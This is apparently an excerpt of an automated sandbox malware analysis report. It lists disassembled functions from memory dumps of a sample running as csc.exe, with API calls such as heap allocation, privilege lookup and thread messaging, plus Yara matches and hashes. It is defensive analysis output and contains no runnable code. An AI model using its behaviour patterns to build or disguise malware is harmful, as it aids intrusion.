                                                                                                                                                                                                                                                                                  • Opcode ID: 8a3bf6a9add8605af82157ef6563f7344ea471fc5de4cb0577208ff9b9b1c040
                                                                                                                                                                                                                                                                                  • Instruction ID: ce7a2a04b5b05b417941cf0b2306cd51e7456afb214a09cd694a1d8d09bad478
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a3bf6a9add8605af82157ef6563f7344ea471fc5de4cb0577208ff9b9b1c040
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22900261A01000435540716889849864019ABE1215F91C925A0988554DC5AA8C656665
                                                                                                                                                                                                                                                                                  Function 05CA2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 65170ce2df1910be1ab432688933e92047d6f89900869f967bb8b0863583634c
                                                                                                                                                                                                                                                                                  • Instruction ID: d44a9068c54f60663f0dc1eb73e8aa6c1483eed02dc5cee2aa5b39c736571cd2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65170ce2df1910be1ab432688933e92047d6f89900869f967bb8b0863583634c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B90027160140403E5006158495478B001987D0306F91C815A1154559DC6768C517571
                                                                                                                                                                                                                                                                                  Function 05CA2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: bc8f5d7427bf77d7e6d12ff3b8bdfad981f18ef135a52f08cc7fb75941bc0002
                                                                                                                                                                                                                                                                                  • Instruction ID: fc40d0cd1ff4be0902b1ca07a14417ac9eebff38d26a0aaabcd5d4b318e5e0d7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc8f5d7427bf77d7e6d12ff3b8bdfad981f18ef135a52f08cc7fb75941bc0002
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F9002A174100443E50061584554B860019C7E1305F91C819E1054558DC66ACC527126
                                                                                                                                                                                                                                                                                  Function 05CA29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 48a5f607d73f58a3ee11feee484582bd3a7642efdb527e29d3d7b28f2376d028
                                                                                                                                                                                                                                                                                  • Instruction ID: f25b87e6192524c8d350792012ad0dffd283f10b05b9ea2085603204a18bb5f5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a5f607d73f58a3ee11feee484582bd3a7642efdb527e29d3d7b28f2376d028
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48900265611000031505A5580744587005A87D5355B91C825F1005554CD6728C616121
                                                                                                                                                                                                                                                                                  Function 05CA2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ab459bd483962c38d6ac9e0914ceb5202a79e12e5cb31dd9becafefa543b0272
                                                                                                                                                                                                                                                                                  • Instruction ID: fff6c22e24804b2ad7507568a19d10c6013835947dc51b7ab1efc689e70acee7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab459bd483962c38d6ac9e0914ceb5202a79e12e5cb31dd9becafefa543b0272
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2190027160100403E500659855486C6001987E0305F91D815A5014559EC6B68C917131
                                                                                                                                                                                                                                                                                  Function 05CA2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: b1e195a029fe1dda135110b3f09d2f06fcec75bb5405d10d3c8bc3ef3d7158ff
                                                                                                                                                                                                                                                                                  • Instruction ID: 3f276009b201deb1f9441b678468e19e979688f649ed5d5d9c747b84238fa9ec
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1e195a029fe1dda135110b3f09d2f06fcec75bb5405d10d3c8bc3ef3d7158ff
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8890027160108803E510615885447CA001987D0305F95CC15A441465CDC6E68C917121
                                                                                                                                                                                                                                                                                  Function 05CA2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: a423fe58b2d0bdcde5160fe7f5c7a7d11094825a9298505a8c491660e8dcf255
                                                                                                                                                                                                                                                                                  • Instruction ID: 72d64deb1b972ec24e27c6af47ac07587c8e8f26f18112998e6c196c87e0dede
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a423fe58b2d0bdcde5160fe7f5c7a7d11094825a9298505a8c491660e8dcf255
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A290027160100803E580715845446CA001987D1305FD1C819A0015658DCA668E5977A1
                                                                                                                                                                                                                                                                                  Function 05CA2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: bf0535e8a5f3d06db141d7f61c7c1f8bf4be5f96471c5f39639aa4bed8feb16c
                                                                                                                                                                                                                                                                                  • Instruction ID: 379f9f4c43d96f32d1798749c62b20a91060329a1c238a47be2cabe7de4d3bfa
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf0535e8a5f3d06db141d7f61c7c1f8bf4be5f96471c5f39639aa4bed8feb16c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B69002A160200003550571584554696401E87E0205F91C825E1004594DC5768C917125
                                                                                                                                                                                                                                                                                  Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                                                                                                                                  • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                                                                                                                                                                                                  Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                  • String ID: 6EA
                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                                                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                                                                                                                                                                                                                  Function 0041A6AB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 9 41a6ab-41a6ac 11 41a64c-41a661 RtlAllocateHeap 9->11 12 41a647 call 41af60 9->12 12->11
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                  • String ID: 6EA
                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                                                                                  • Opcode ID: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                                                                                                                                                                                                                                                                  • Instruction ID: ca5c2ad009bb5830261af26d6cd8d5f5f20ef4a650c85af14dc2c9a9921a2f81
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D02BF91092845FD700DF74DD808DB7754AF85318738844EF84D03303C130D426A6B2
                                                                                                                                                                                                                                                                                  Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 215 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 224 40835c-40836e PostThreadMessageW 215->224 225 40838e-408392 215->225 226 408370-40838a call 40a480 224->226 227 40838d 224->227 226->227 227->225
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                  • Opcode ID: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                                                                                                                                                                                                                                                                  • Instruction ID: deec3d3271cf7ae617df0fac63ab8d80f0a55d98960cf64c01aa098855739ce5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01B531A8032976E721A6A59C43FEE772CAB41B54F14015EFE04BA1C2E6A8690547EA
                                                                                                                                                                                                                                                                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 230 408310-40831f 231 408328-40835a call 41ca00 call 40acf0 call 414e50 230->231 232 408323 call 41be60 230->232 239 40835c-40836e PostThreadMessageW 231->239 240 40838e-408392 231->240 232->231 241 408370-40838a call 40a480 239->241 242 40838d 239->242 241->242 242->240
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                  • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                                                                                                                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                                                                                                                                                                                                  Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 260 41a7c2-41a7c9 261 41a7a3-41a7c0 260->261 262 41a7cb-41a7ea call 41af60 260->262 265 41a7ef-41a804 LookupPrivilegeValueW 262->265
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                                                                                                                                                                                                                                                                  • Instruction ID: 23f3b5c59c3bf1b946c484d1dd1b09d9bbd519211ec81ee406c7880a26dda3c9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF022B62002086BDB10DFA9DC80EE73369EF89720F04864AFD1C47281C534E8158BB0
                                                                                                                                                                                                                                                                                  Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 277 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                                                                                  • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                                                                                                                                                                                                                  Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                                                                                  • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                                                                                                                                                                                                                  Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                                                                                  • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                                                                                                                                                                                                                  Function 05CA2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
